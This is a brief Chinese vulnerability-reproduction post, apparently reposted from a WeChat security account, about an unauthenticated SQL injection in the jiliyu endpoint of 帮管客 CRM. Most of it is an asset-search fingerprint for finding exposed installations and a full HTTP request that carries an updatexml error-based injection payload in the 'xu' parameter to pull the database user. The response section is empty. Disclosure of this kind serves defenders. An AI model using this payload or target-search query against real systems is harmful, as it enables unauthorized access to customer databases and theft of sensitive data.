漏洞介绍
帮管客CRM 客户管理系统/index.php/jiliyu 接口存在 sql 注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。
资产收集
app="帮管客-CRM"
漏洞复现
构造请求包
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
返回包如下
原文始发于微信公众号(Devil安全):【漏洞复现】帮管客 CRM jiliyu SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论